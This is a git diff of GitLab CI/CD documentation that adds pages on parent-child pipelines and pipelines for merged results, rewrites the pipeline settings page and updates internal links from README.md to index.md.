b/doc/ci/pipelines/parent_child_pipelines.md new file mode 100644 index 00000000000..2e29f4fe812 --- /dev/null +++ b/doc/ci/pipelines/parent_child_pipelines.md @@ -0,0 +1,192 @@ +--- +stage: Verify +group: Pipeline Authoring +info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://about.gitlab.com/handbook/engineering/ux/technical-writing/#assignments +type: reference +--- + +# Parent-child pipelines **(FREE)** + +> [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/16094) in GitLab 12.7. + +As pipelines grow more complex, a few related problems start to emerge: + +- The staged structure, where all steps in a stage must be completed before the first + job in next stage begins, causes arbitrary waits, slowing things down. +- Configuration for the single global pipeline becomes very long and complicated, + making it hard to manage. +- Imports with [`include`](../yaml/index.md#include) increase the complexity of the configuration, and create the potential + for namespace collisions where jobs are unintentionally duplicated. +- Pipeline UX can become unwieldy with so many jobs and stages to work with. + +Additionally, sometimes the behavior of a pipeline needs to be more dynamic. The ability +to choose to start sub-pipelines (or not) is a powerful ability, especially if the +YAML is dynamically generated. + + + +Similarly to [multi-project pipelines](multi_project_pipelines.md), a pipeline can trigger a +set of concurrently running child pipelines, but within the same project: + +- Child pipelines still execute each of their jobs according to a stage sequence, but + would be free to continue forward through their stages without waiting for unrelated + jobs in the parent pipeline to finish. +- The configuration is split up into smaller child pipeline configurations, which are + easier to understand. This reduces the cognitive load to understand the overall configuration. +- Imports are done at the child pipeline level, reducing the likelihood of collisions. +- Each pipeline has only relevant steps, making it easier to understand what's going on. + +Child pipelines work well with other GitLab CI/CD features: + +- Use [`rules: changes`](../yaml/index.md#ruleschanges) to trigger pipelines only when + certain files change. This is useful for monorepos, for example. +- Since the parent pipeline in `.gitlab-ci.yml` and the child pipeline run as normal + pipelines, they can have their own behaviors and sequencing in relation to triggers. + +See the [`trigger:`](../yaml/index.md#trigger) keyword documentation for full details on how to +include the child pipeline configuration. + +<i class="fa fa-youtube-play youtube" aria-hidden="true"></i> +For an overview, see [Parent-Child Pipelines feature demo](https://youtu.be/n8KpBSqZNbk). + +## Examples + +The simplest case is [triggering a child pipeline](../yaml/index.md#trigger) using a +local YAML file to define the pipeline configuration. In this case, the parent pipeline +triggers the child pipeline, and continues without waiting: + +```yaml +microservice_a: + trigger: + include: path/to/microservice_a.yml +``` + +You can include multiple files when composing a child pipeline: + +```yaml +microservice_a: + trigger: + include: + - local: path/to/microservice_a.yml + - template: Security/SAST.gitlab-ci.yml +``` + +In [GitLab 13.5](https://gitlab.com/gitlab-org/gitlab/-/issues/205157) and later, +you can use [`include:file`](../yaml/index.md#includefile) to trigger child pipelines +with a configuration file in a different project: + +```yaml +microservice_a: + trigger: + include: + - project: 'my-group/my-pipeline-library' + file: 'path/to/ci-config.yml' +``` + +The maximum number of entries that are accepted for `trigger:include:` is three. + +Similar to [multi-project pipelines](multi_project_pipelines.md#mirror-status-of-a-triggered-pipeline-in-the-trigger-job), +we can set the parent pipeline to depend on the status of the child pipeline upon completion: + +```yaml +microservice_a: + trigger: + include: + - local: path/to/microservice_a.yml + - template: Security/SAST.gitlab-ci.yml + strategy: depend +``` + +## Merge Request child pipelines + +To trigger a child pipeline as a [Merge Request Pipeline](merge_request_pipelines.md) we need to: + +- Set the trigger job to run on merge requests: + +```yaml +# parent .gitlab-ci.yml +microservice_a: + trigger: + include: path/to/microservice_a.yml + rules: + - if: $CI_MERGE_REQUEST_ID +``` + +- Configure the child pipeline by either: + + - Setting all jobs in the child pipeline to evaluate in the context of a merge request: + + ```yaml + # child path/to/microservice_a.yml + workflow: + rules: + - if: $CI_MERGE_REQUEST_ID + + job1: + script: ... + + job2: + script: ... + ``` + + - Alternatively, setting the rule per job. For example, to create only `job1` in + the context of merge request pipelines: + + ```yaml + # child path/to/microservice_a.yml + job1: + script: ... + rules: + - if: $CI_MERGE_REQUEST_ID + + job2: + script: ... + ``` + +## Dynamic child pipelines + +> [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/35632) in GitLab 12.9. + +Instead of running a child pipeline from a static YAML file, you can define a job that runs +your own script to generate a YAML file, which is then [used to trigger a child pipeline](../yaml/index.md#trigger-child-pipeline-with-generated-configuration-file). + +This technique can be very powerful in generating pipelines targeting content that changed or to +build a matrix of targets and architectures. + +<i class="fa fa-youtube-play youtube" aria-hidden="true"></i> +For an overview, see [Create child pipelines using dynamically generated configurations](https://youtu.be/nMdfus2JWHM). + +<!-- vale gitlab.Spelling = NO --> +We also have an example project using +[Dynamic Child Pipelines with Jsonnet](https://gitlab.com/gitlab-org/project-templates/jsonnet) +which shows how to use a data templating language to generate your `.gitlab-ci.yml` at runtime. You could use a similar process for other templating languages like [Dhall](https://dhall-lang.org/) or [`ytt`](https://get-ytt.io/). +<!-- vale gitlab.Spelling = NO --> + +The artifact path is parsed by GitLab, not the runner, so the path must match the +syntax for the OS running GitLab. If GitLab is running on Linux but using a Windows +runner for testing, the path separator for the trigger job would be `/`. Other CI/CD +configuration for jobs, like scripts, that use the Windows runner would use `\`. + +In GitLab 12.9, the child pipeline could fail to be created in certain cases, causing the parent pipeline to fail. +This is [resolved in GitLab 12.10](https://gitlab.com/gitlab-org/gitlab/-/issues/209070). + +## Nested child pipelines + +> - [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/29651) in GitLab 13.4. +> - [Feature flag removed](https://gitlab.com/gitlab-org/gitlab/-/issues/243747) in GitLab 13.5. + +Parent and child pipelines were introduced with a maximum depth of one level of child +pipelines, which was later increased to two. A parent pipeline can trigger many child +pipelines, and these child pipelines can trigger their own child pipelines. It's not +possible to trigger another level of child pipelines. + +<i class="fa fa-youtube-play youtube" aria-hidden="true"></i> +For an overview, see [Nested Dynamic Pipelines](https://youtu.be/C5j3ju9je2M). + +## Pass CI/CD variables to a child pipeline + +You can pass CI/CD variables to a downstream pipeline using the same methods as +multi-project pipelines: + +- [By using the `variable` keyword](multi_project_pipelines.md#pass-cicd-variables-to-a-downstream-pipeline-by-using-the-variables-keyword). +- [By using variable inheritance](multi_project_pipelines.md#pass-cicd-variables-to-a-downstream-pipeline-by-using-variable-inheritance). diff --git a/doc/ci/pipelines/pipeline_architectures.md b/doc/ci/pipelines/pipeline_architectures.md index 78031ec1d97..1b23727b142 100644 --- a/doc/ci/pipelines/pipeline_architectures.md +++ b/doc/ci/pipelines/pipeline_architectures.md @@ -18,7 +18,7 @@ own advantages. These methods can be mixed and matched if needed: - [Child/Parent Pipelines](#child--parent-pipelines): Good for monorepos and projects with lots of independently defined components. For more details about -any of the keywords used below, check out our [CI YAML reference](../yaml/README.md) for details. +any of the keywords used below, check out our [CI YAML reference](../yaml/index.md) for details. ## Basic Pipelines @@ -96,7 +96,7 @@ deploy_b: If efficiency is important to you and you want everything to run as quickly as possible, you can use [Directed Acyclic Graphs (DAG)](../directed_acyclic_graph/index.md). Use the -[`needs` keyword](../yaml/README.md#needs) to define dependency relationships between +[`needs` keyword](../yaml/index.md#needs) to define dependency relationships between your jobs. When GitLab knows the relationships between your jobs, it can run everything as fast as possible, and even skips into subsequent stages when possible. @@ -162,13 +162,13 @@ deploy_b: ## Child / Parent Pipelines In the examples above, it's clear we've got two types of things that could be built independently. -This is an ideal case for using [Child / Parent Pipelines](../parent_child_pipelines.md)) via -the [`trigger` keyword](../yaml/README.md#trigger). It separates out the configuration +This is an ideal case for using [Child / Parent Pipelines](parent_child_pipelines.md)) via +the [`trigger` keyword](../yaml/index.md#trigger). It separates out the configuration into multiple files, keeping things very simple. You can also combine this with: -- The [`rules` keyword](../yaml/README.md#rules): For example, have the child pipelines triggered only +- The [`rules` keyword](../yaml/index.md#rules): For example, have the child pipelines triggered only when there are changes to that area. -- The [`include` keyword](../yaml/README.md#include): Bring in common behaviors, ensuring +- The [`include` keyword](../yaml/index.md#include): Bring in common behaviors, ensuring you are not repeating yourself. - [DAG pipelines](#directed-acyclic-graph-pipelines) inside of child pipelines, achieving the benefits of both. diff --git a/doc/ci/pipelines/pipeline_artifacts.md b/doc/ci/pipelines/pipeline_artifacts.md index b80a056bbca..55555571f97 100644 --- a/doc/ci/pipelines/pipeline_artifacts.md +++ b/doc/ci/pipelines/pipeline_artifacts.md @@ -9,7 +9,7 @@ type: reference, howto Pipeline artifacts are files created by GitLab after a pipeline finishes. These are different than [job artifacts](job_artifacts.md) because they are not explicitly managed by the `.gitlab-ci.yml` definitions. -Pipeline artifacts are used by the [test coverage visualization feature](../../user/project/merge_requests/test_coverage_visualization.md) to collect coverage information. It uses the [`artifacts: reports`](../yaml/README.md#artifactsreports) CI/CD keyword. +Pipeline artifacts are used by the [test coverage visualization feature](../../user/project/merge_requests/test_coverage_visualization.md) to collect coverage information. It uses the [`artifacts: reports`](../yaml/index.md#artifactsreports) CI/CD keyword. ## Storage diff --git a/doc/ci/pipelines/pipeline_efficiency.md b/doc/ci/pipelines/pipeline_efficiency.md index 5bb435dddf6..91560a0420f 100644 --- a/doc/ci/pipelines/pipeline_efficiency.md +++ b/doc/ci/pipelines/pipeline_efficiency.md @@ -33,7 +33,7 @@ heavily influenced by the: - The ["critical path"](#directed-acyclic-graphs-dag-visualization), which represents the minimum and maximum pipeline duration. -Additional points to pay attention relate to [GitLab Runners](../runners/README.md): +Additional points to pay attention relate to [GitLab Runners](../runners/index.md): - Availability of the runners and the resources they are provisioned with. - Build dependencies and their installation time. @@ -62,7 +62,7 @@ It's important to understand and document the pipeline workflows, and discuss po actions and changes. Refactoring pipelines may need careful interaction between teams in the DevSecOps lifecycle. -Pipeline analysis can help identify issues with cost efficiency. For example, [runners](../runners/README.md) +Pipeline analysis can help identify issues with cost efficiency. For example, [runners](../runners/index.md) hosted with a paid cloud service may be provisioned with: - More resources than needed for CI/CD pipelines, wasting money. @@ -100,7 +100,7 @@ representation of pipeline health. Instance administrators have access to additional [performance metrics and self-monitoring](../../administration/monitoring/index.md). -You can fetch specific pipeline health metrics from the [API](../../api/README.md). +You can fetch specific pipeline health metrics from the [API](../../api/index.md). External monitoring tools can poll the API and verify pipeline health or collect metrics for long term SLA analytics. @@ -146,7 +146,7 @@ with embedded metric charts and all valuable details to analyze the problem. Review the storage use of the following to help analyze costs and efficiency: -- [Job artifacts](job_artifacts.md) and their [`expire_in`](../yaml/README.md#artifactsexpire_in) +- [Job artifacts](job_artifacts.md) and their [`expire_in`](../yaml/index.md#artifactsexpire_in) configuration. If kept for too long, storage usage grows and could slow pipelines down. - [Container registry](../../user/packages/container_registry/index.md) usage. - [Package registry](../../user/packages/package_registry/index.md) usage. @@ -162,9 +162,9 @@ make pipelines run faster and more efficiently. Try to find which jobs don't need to run in all situations, and use pipeline configuration to stop them from running: -- Use the [`interruptible`](../yaml/README.md#interruptible) keyword to stop old pipelines +- Use the [`interruptible`](../yaml/index.md#interruptible) keyword to stop old pipelines when they are superseded by a newer pipeline. -- Use [`rules`](../yaml/README.md#rules) to skip tests that aren't needed. For example, +- Use [`rules`](../yaml/index.md#rules) to skip tests that aren't needed. For example, skip backend tests when only the frontend code is changed. - Run non-essential [scheduled pipelines](schedules.md) less frequently. @@ -186,7 +186,7 @@ shouldn't run, saving pipeline resources. In a basic configuration, jobs always wait for all other jobs in earlier stages to complete before running. This is the simplest configuration, but it's also the slowest in most cases. [Directed Acyclic Graphs](../directed_acyclic_graph/index.md) and -[parent/child pipelines](../parent_child_pipelines.md) are more flexible and can +[parent/child pipelines](parent_child_pipelines.md) are more flexible and can be more efficient, but can also make pipelines harder to understand and analyze. ### Caching @@ -195,7 +195,7 @@ Another optimization method is to [cache](../caching/index.md) dependencies. If dependencies change rarely, like [NodeJS `/node_modules`](../caching/index.md#cache-nodejs-dependencies), caching can make pipeline execution much faster. -You can use [`cache:when`](../yaml/README.md#cachewhen) to cache downloaded dependencies +You can use [`cache:when`](../yaml/index.md#cachewhen) to cache downloaded dependencies even when a job fails. ### Docker Images diff --git a/doc/ci/pipelines/pipelines_for_merged_results.md b/doc/ci/pipelines/pipelines_for_merged_results.md new file mode 100644 index 00000000000..efa6a373ef3 --- /dev/null +++ b/doc/ci/pipelines/pipelines_for_merged_results.md @@ -0,0 +1,135 @@ +--- +stage: Verify +group: Pipeline Execution +info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://about.gitlab.com/handbook/engineering/ux/technical-writing/#assignments +type: reference +last_update: 2019-07-03 +--- + +# Pipelines for merged results **(PREMIUM)** + +> [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/7380) in [GitLab Premium](https://about.gitlab.com/pricing/) 11.10. + +When you submit a merge request, you are requesting to merge changes from a +source branch into a target branch. By default, the CI pipeline runs jobs +against the source branch. + +With *pipelines for merged results*, the pipeline runs as if the changes from +the source branch have already been merged into the target branch. The commit shown for the pipeline does not exist on the source or target branches but represents the combined target and source branches. + + + +If the pipeline fails due to a problem in the target branch, you can wait until the +target is fixed and re-run the pipeline. +This new pipeline runs as if the source is merged with the updated target, and you +don't need to rebase. + +The pipeline does not automatically run when the target branch changes. Only changes +to the source branch trigger a new pipeline. If a long time has passed since the last successful +pipeline, you may want to re-run it before merge, to ensure that the source changes +can still be successfully merged into the target. + +When the merge request can't be merged, the pipeline runs against the source branch only. For example, when: + +- The target branch has changes that conflict with the changes in the source branch. +- The merge request is a [**Draft** merge request](../../user/project/merge_requests/drafts.md). + +In these cases, the pipeline runs as a [pipeline for merge requests](merge_request_pipelines.md) +and is labeled as `detached`. If these cases no longer exist, new pipelines +again run against the merged results. + +Any user who has developer [permissions](../../user/permissions.md) can run a +pipeline for merged results. + +## Prerequisites + +To enable pipelines for merge results: + +- You must have the [Maintainer role](../../user/permissions.md). +- You must be using [GitLab Runner](https://gitlab.com/gitlab-org/gitlab-runner) 11.9 or later. +- You must not be using + [fast forward merges](../../user/project/merge_requests/fast_forward_merge.md) yet. + To follow progress, see [#58226](https://gitlab.com/gitlab-org/gitlab/-/issues/26996). +- Your repository must be a GitLab repository, not an + [external repository](../ci_cd_for_external_repos/index.md). + +## Enable pipelines for merged results + +To enable pipelines for merged results for your project: + +1. [Configure your CI/CD configuration file](merge_request_pipelines.md#configure-pipelines-for-merge-requests) + so that the pipeline or individual jobs run for merge requests. +1. Visit your project's **Settings > General** and expand **Merge requests**. +1. Check **Enable merged results pipelines**. +1. Click **Save changes**. + +WARNING: +If you select the check box but don't configure your CI/CD to use +pipelines for merge requests, your merge requests may become stuck in an +unresolved state or your pipelines may be dropped. + +## Using Merge Trains + +When you enable [Pipelines for merged results](#pipelines-for-merged-results), +GitLab [automatically displays](merge_trains.md#add-a-merge-request-to-a-merge-train) +a **Start/Add Merge Train button**. + +Generally, this is a safer option than merging merge requests immediately, because your +merge request is evaluated with an expected post-merge result before the actual +merge happens. + +For more information, read the [documentation on Merge Trains](merge_trains.md). + +## Automatic pipeline cancellation + +> [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/12996) in [GitLab Premium](https://about.gitlab.com/pricing/) 12.3. + +GitLab CI/CD can detect the presence of redundant pipelines, and cancels them +to conserve CI resources. + +When a user merges a merge request immediately in an ongoing merge +train, the train is reconstructed, because it recreates the expected +post-merge commit and pipeline. In this case, the merge train may already +have pipelines running against the previous expected post-merge commit. +These pipelines are considered redundant and are automatically +canceled. + +## Troubleshooting + +### Pipelines for merged results not created even with new change pushed to merge request + +Can be caused by some disabled feature flags. Please make sure that +the following feature flags are enabled on your GitLab instance: + +- `:merge_ref_auto_sync` + +To check and set these feature flag values, please ask an administrator to: + +1. Log into the Rails console of the GitLab instance: + + ```shell + sudo gitlab-rails console + ``` + +1. Check if the flags are enabled or not: + + ```ruby + Feature.enabled?(:merge_ref_auto_sync) + ``` + +1. If needed, enable the feature flags: + + ```ruby + Feature.enable(:merge_ref_auto_sync) + ``` + +### Intermittently pipelines fail by `fatal: reference is not a tree:` error + +Since pipelines for merged results are a run on a merge ref of a merge request +(`refs/merge-requests/<iid>/merge`), the Git reference could be overwritten at an +unexpected timing. For example, when a source or target branch is advanced. +In this case, the pipeline fails because of `fatal: reference is not a tree:` error, +which indicates that the checkout-SHA is not found in the merge ref. + +This behavior was improved at GitLab 12.4 by introducing [Persistent pipeline refs](../troubleshooting.md#fatal-reference-is-not-a-tree-error). +You should be able to create pipelines at any timings without concerning the error. diff --git a/doc/ci/pipelines/schedules.md b/doc/ci/pipelines/schedules.md index c6a40039816..9cb600ae551 100644 --- a/doc/ci/pipelines/schedules.md +++ b/doc/ci/pipelines/schedules.md @@ -52,14 +52,14 @@ is installed on. ### Using variables You can pass any number of arbitrary variables. They are available in -GitLab CI/CD so that they can be used in your [`.gitlab-ci.yml` file](../../ci/yaml/README.md). +GitLab CI/CD so that they can be used in your [`.gitlab-ci.yml` file](../../ci/yaml/index.md).  ### Using `rules` To configure a job to be executed only when the pipeline has been -scheduled, use the [`rules`](../yaml/README.md#rules) keyword. +scheduled, use the [`rules`](../yaml/index.md#rules) keyword. In this example, `make world` runs in scheduled pipelines, and `make build` runs in branch and tag pipelines: diff --git a/doc/ci/pipelines/settings.md b/doc/ci/pipelines/settings.md index 2e842856e55..db6fa7f4d23 100644 --- a/doc/ci/pipelines/settings.md +++ b/doc/ci/pipelines/settings.md @@ -6,125 +6,199 @@ disqus_identifier: 'https://docs.gitlab.com/ee/user/project/pipelines/settings.h type: reference, howto --- -# Pipeline settings **(FREE)** +# Customize pipeline configuration **(FREE)** -To reach the pipelines settings navigate to your project's -**Settings > CI/CD**. - -The following settings can be configured per project. +You can customize how pipelines run for your project. <i class="fa fa-youtube-play youtube" aria-hidden="true"></i> -For an overview, watch the video [GitLab CI Pipeline, Artifacts, and Environments](https://www.youtube.com/watch?v=PCKDICEe10s). +For an overview of pipelines, watch the video [GitLab CI Pipeline, Artifacts, and Environments](https://www.youtube.com/watch?v=PCKDICEe10s). Watch also [GitLab CI pipeline tutorial for beginners](https://www.youtube.com/watch?v=Jav4vbUrqII). -You can use the pipeline status to determine if a merge request can be merged: +## Change which users can view your pipelines -- [Merge when pipeline succeeds](../../user/project/merge_requests/merge_when_pipeline_succeeds.md). -- [Only allow merge requests to be merged if the pipeline succeeds](../../user/project/merge_requests/merge_when_pipeline_succeeds.md#only-allow-merge-requests-to-be-merged-if-the-pipeline-succeeds). +For public and internal projects, you can change who can see your: -## Git strategy +- Pipelines +- Job output logs +- Job artifacts +- [Pipeline security dashboard](../../user/application_security/security_dashboard/index.md#pipeline-security) -With Git strategy, you can choose the default way your repository is fetched -from GitLab in a job. +However: -There are two options. Using: +- Job output logs and artifacts are [never visible for Guest users and non-project members](https://gitlab.com/gitlab-org/gitlab/-/issues/25649). -- `git clone`, which is slower because it clones the repository from scratch - for every job, ensuring that the local working copy is always pristine. -- `git fetch`, which is default in GitLab and faster as it re-uses the local working copy (falling - back to clone if it doesn't exist). - This is recommended, especially for [large repositories](../large_repositories/index.md#git-strategy). +To change the visibility of your pipelines and related features: -The configured Git strategy can be overridden by the [`GIT_STRATEGY` variable](../runners/configure_runners.md#git-strategy) -in `.gitlab-ci.yml`. +1. On the top bar, select **Menu > Projects** and find your project. +1. On the left sidebar, select **Settings > CI/CD**. +1. Expand **General pipelines**. +1. Select or clear the **Public pipelines** checkbox. + When it is selected, pipelines and related features are visible: -## Git shallow clone + - For **public** projects, to everyone. + - For **internal** projects, to all logged-in users except [external users](../../user/permissions.md#external-users). + - For **private** projects, to all project members (Guest or higher). -> [Introduced](https://gitlab.com/gitlab-org/gitlab-foss/-/merge_requests/28919) in GitLab 12.0. + When it is cleared: -It is possible to limit the number of changes that GitLab CI/CD fetches when cloning -a repository. Setting a limit to `git depth` can speed up Pipelines execution. + - For **public** projects, pipelines are visible to everyone. Related features are visible + only to project members (Reporter or higher). + - For **internal** projects, pipelines are visible to all logged in users except [external users](../../user/permissions.md#external-users). + Related features are visible only to project members (Reporter or higher). + - For **private** projects, pipelines and related features are visible to project members (Reporter or higher) only. -In GitLab 12.0 and later, newly created projects automatically have a default -`git depth` value of `50`. The maximum allowed value is `1000`. +## Auto-cancel redundant pipelines + +You can set pending or running pipelines to cancel automatically when a new pipeline runs on the same branch. You can enable this in the project settings: + +1. On the top bar, select **Menu > Projects** and find your project. +1. On the left sidebar, select **Settings > CI/CD**. +1. Expand **General Pipelines**. +1. Select the **Auto-cancel redundant pipelines** checkbox. +1. Select **Save changes**. + +Use the [`interruptible`](../yaml/index.md#interruptible) keyword to indicate if a +running job can be cancelled before it completes. -To disable shallow clone and make GitLab CI/CD fetch all branches and tags each time, -keep the value empty or set to `0`. +## Skip outdated deployment jobs + +> [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/25276) in GitLab 12.9. + +Your project may have multiple concurrent deployment jobs that are +scheduled to run in the same time frame. + +This can lead to a situation where an older deployment job runs after a +newer one, which may not be what you want. -This value can also be [overridden by `GIT_DEPTH`](../large_repositories/index.md#shallow-cloning) variable in `.gitlab-ci.yml` file. +To avoid this scenario: -## Timeout +1. On the top bar, select **Menu > Projects** and find your project. +1. On the left sidebar, select **Settings > CI/CD**. +1. Expand **General pipelines**. +1. Select the **Skip outdated deployment jobs** checkbox. +1. Select **Save changes**. -Timeout defines the maximum amount of time in minutes that a job is able run. -This is configurable under your project's **Settings > CI/CD > General pipelines settings**. -The default value is 60 minutes. Decrease the time limit if you want to impose -a hard limit on your jobs' running time or increase it otherwise. In any case, -if the job surpasses the threshold, it is marked as failed. +Older deployment job are skipped when a new deployment starts. -### Timeout overriding for runners +For more information, see [Deployment safety](../environments/deployment_safety.md). -> [Introduced](https://gitlab.com/gitlab-org/gitlab-foss/-/merge_requests/17221) in GitLab 10.7. +## Retry outdated jobs -Project defined timeout (either specific timeout set by user or the default -60 minutes timeout) may be [overridden for runners](../runners/configure_runners.md#set-maximum-job-timeout-for-a-runner). +> [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/211339) in GitLab 13.6. -## Maximum artifacts size **(FREE SELF)** +A deployment job can fail because a newer one has run. If you retry the failed deployment job, the +environment could be overwritten with older source code. If you click **Retry**, a modal warns you +about this and asks for confirmation. -For information about setting a maximum artifact size for a project, see -[Maximum artifacts size](../../user/admin_area/settings/continuous_integration.md#maximum-artifacts-size). +For more information, see [Deployment safety](../environments/deployment_safety.md). -## Custom CI/CD configuration file +## Specify a custom CI/CD configuration file > [Support for external `.gitlab-ci.yml` locations](https://gitlab.com/gitlab-org/gitlab/-/issues/14376) introduced in GitLab 12.6. -By default we look for the `.gitlab-ci.yml` file in the project's root -directory. If needed, you can specify an alternate path and filename, including locations outside the project. +GitLab expects to find the CI/CD configuration file (`.gitlab-ci.yml`) in the project's root +directory. However, you can specify an alternate filename path, including locations outside the project. To customize the path: -1. Go to the project's **Settings > CI/CD**. -1. Expand the **General pipelines** section. -1. Provide a value in the **CI/CD configuration file** field. -1. Click **Save changes**. +1. On the top bar, select **Menu > Projects** and find your project. +1. On the left sidebar, select **Settings > CI/CD**. +1. Expand **General pipelines**. +1. In the **CI/CD configuration file** field, enter the filename. If the file: + - Is not in the root directory, include the path. + - Is in a different project, include the group and project name. + - Is on an external site, enter the full URL. +1. Select **Save changes**. + +### Custom CI/CD configuration file examples -If the CI/CD configuration file is stored in the repository in a non-default -location, the path must be relative to the root directory. Examples of valid -paths and file names include: +If the CI/CD configuration file is not in the root directory, the path must be relative to it. +For example: -- `.gitlab-ci.yml` (default) -- `.my-custom-file.yml` - `my/path/.gitlab-ci.yml` - `my/path/.my-custom-file.yml` -If hosting the CI/CD configuration file on an external site, the URL link must end with `.yml`: +If the CI/CD configuration file is on an external site, the URL must end with `.yml`: - `http://example.com/generate/ci/config.yml` -If hosting the CI/CD configuration file in a different project in GitLab, the path must be relative +If the CI/CD configuration file is in a different project, the path must be relative to the root directory in the other project. Include the group and project name at the end: - `.gitlab-ci.yml@mygroup/another-project` - `my/path/.my-custom-file.yml@mygroup/another-project` -Hosting the configuration file in a separate project allows stricter control of the -configuration file. For example: +If the configuration file is in a separate project, you can more set more granular permissions. For example: - Create a public project to host the configuration file. - Give write permissions on the project only to users who are allowed to edit the file. -Other users and projects can access the configuration file without being +Then other users and projects can access the configuration file without being able to edit it. -## Test coverage parsing +## Choose the default Git strategy + +You can choose how your repository is fetched from GitLab when a job runs. + +1. On the top bar, select **Menu > Projects** and find your project. +1. On the left sidebar, select **Settings > CI/CD**. +1. Expand **General pipelines**. +1. Under **Git strategy**, select an option: + - `git clone` is slower because it clones the repository from scratch + for every job. However, the local working copy is always pristine. + - `git fetch` is faster because it re-uses the local working copy (and falls + back to clone if it doesn't exist). This is recommended, especially for + [large repositories](../large_repositories/index.md#git-strategy). + +The configured Git strategy can be overridden by the [`GIT_STRATEGY` variable](../runners/configure_runners.md#git-strategy) +in the `.gitlab-ci.yml` file. + +## Limit the number of changes fetched during clone + +> [Introduced](https://gitlab.com/gitlab-org/gitlab-foss/-/merge_requests/28919) in GitLab 12.0. + +You can limit the number of changes that GitLab CI/CD fetches when it clones +a repository. + +1. On the top bar, select **Menu > Projects** and find your project. +1. On the left sidebar, select **Settings > CI/CD**. +1. Expand **General pipelines**. +1. Under **Git strategy**, under **Git shallow clone**, enter a value. + The maximum value is `1000`. To disable shallow clone and make GitLab CI/CD + fetch all branches and tags each time, keep the value empty or set to `0`. + +In GitLab 12.0 and later, newly created projects automatically have a default +`git depth` value of `50`. + +This value can be overridden by the [`GIT_DEPTH` variable](../large_repositories/index.md#shallow-cloning) +in the `.gitlab-ci.yml` file. + +## Set a limit for how long jobs can run + +You can define how long a job can run before it times out. + +1. On the top bar, select **Menu > Projects** and find your project. +1. On the left sidebar, select **Settings > CI/CD**. +1. Expand **General pipelines**. +1. In the **Timeout** field, enter the number of minutes, or a human-readable value like `2 hours`. + +Jobs that exceed the timeout are marked as failed. + +You can override this value [for individual runners](../runners/configure_runners.md#set-maximum-job-timeout-for-a-runner). + +## Add test coverage results to a merge request -If you use test coverage in your code, GitLab can capture its output in the -job log using a regular expression. +If you use test coverage in your code, you can use a regular expression to +find coverage results in the job log. You can then include these results +in the merge request in GitLab. -In your project, go to **Settings > CI/CD** and expand the **General pipelines** -section. Enter the regular expression in the **Test coverage parsing** field. +1. On the top bar, select **Menu > Projects** and find your project. +1. On the left sidebar, select **Settings > CI/CD**. +1. Expand **General pipelines**. +1. In the **Test coverage parsing** field, enter a regular expression. + Leave blank to disable this feature. -Leave blank if you want to disable it or enter a Ruby regular expression. You -can use <https://rubular.com> to test your regex. The regex returns the **last** +You can use <https://rubular.com> to test your regex. The regex returns the **last** match found in the output. If the pipeline succeeds, the coverage is shown in the merge request widget and @@ -135,6 +209,10 @@ averaged.  +### Test coverage examples + +Use this regex for commonly used test tools. + <!-- vale gitlab.Spelling = NO --> - Simplecov (Ruby). Example: `\(\d+.\d+\%\) covered`. @@ -148,27 +226,51 @@ averaged. - `mix test --cover` (Elixir). Example: `\d+.\d+\%\s+\|\s+Total`. - JaCoCo (Java/Kotlin). Example: `Total.*?([0-9]{1,3})%`. - `go test -cover` (Go). Example: `coverage: \d+.\d+% of statements`. -- .Net (OpenCover). Example: `(Visited Points).*\((.*)\)`. -- .Net (`dotnet test` line coverage). Example: `Total\s*\|\s*(\d+(?:\.\d+)?)`. +- .NET (OpenCover). Example: `(Visited Points).*\((.*)\)`. +- .NET (`dotnet test` line coverage). Example: `Total\s*\|\s*(\d+(?:\.\d+)?)`. <!-- vale gitlab.Spelling = YES --> -### Code Coverage history +### View code coverage history > - [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/209121) the ability to download a `.csv` in GitLab 12.10. > - [Graph introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/33743) in GitLab 13.1. To see the evolution of your project code coverage over time, -you can view a graph or download a CSV file with this data. From your project: +you can view a graph or download a CSV file with this data. + +1. On the top bar, select **Menu > Projects** and find your project. +1. On the left sidebar, select **Analytics > Repository**. -1. Go to **Project Analytics > Repository** to see the historic data for each job listed in the dropdown above the graph. -1. If you want a CSV file of that data, click **Download raw data (`.csv`)** +The historic data for each job is listed in the dropdown above the graph. + +To view a CSV file of the data, select **Download raw data (`.csv`)**.  Code coverage data is also [available at the group level](../../user/group/repositories_analytics/index.md). -### Removing color codes +### Coverage check approval rule **(PREMIUM)** + +> - [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/15765) in GitLab 14.0. +> - [Made configurable in Project Settings](https://gitlab.com/gitlab-org/gitlab/-/issues/331001) in GitLab 14.1. + +You can implement merge request approvals to require approval by selected users or a group +when merging a merge request would cause the project's test coverage to decline. + +Follow these steps to enable the `Coverage-Check` MR approval rule: + +1. Go to your project and select **Settings > General**. +1. Expand **Merge request approvals**. +1. Select **Enable** next to the `Coverage-Check` approval rule. +1. Select the **Target branch**. +1. Set the number of **Approvals required** to greater than zero. +1. Select the users or groups to provide approval. +1. Select **Add approval rule**. + + + +### Remove color codes from code coverage Some test coverage tools output with ANSI color codes that aren't parsed correctly by the regular expression. This causes coverage @@ -184,93 +286,20 @@ For example: lein cloverage | perl -pe 's/\e\[?.*?[\@-~]//g' ``` -## Visibility of pipelines - -Pipeline visibility is determined by: - -- Your current [user access level](../../user/permissions.md). -- The **Public pipelines** project setting under your project's **Settings > CI/CD > General pipelines**. - -NOTE: -If the project visibility is set to **Private**, the [**Public pipelines** setting has no effect](../enable_or_disable_ci.md#per-project-user-setting). - -This also determines the visibility of these related features: - -- Job output logs -- Job artifacts -- The [pipeline security dashboard](../../user/application_security/security_dashboard/index.md#pipeline-security) **(ULTIMATE)** - -Job logs and artifacts are [not visible for guest users and non-project members](https://gitlab.com/gitlab-org/gitlab/-/issues/25649). - -If **Public pipelines** is enabled (default): - -- For **public** projects, anyone can view the pipelines and related features. -- For **internal** projects, any logged in user except [external users](../../user/permissions.md#external-users) can view the pipelines - and related features. -- For **private** projects, any project member (guest or higher) can view the pipelines - and related features. - -If **Public pipelines** is disabled: - 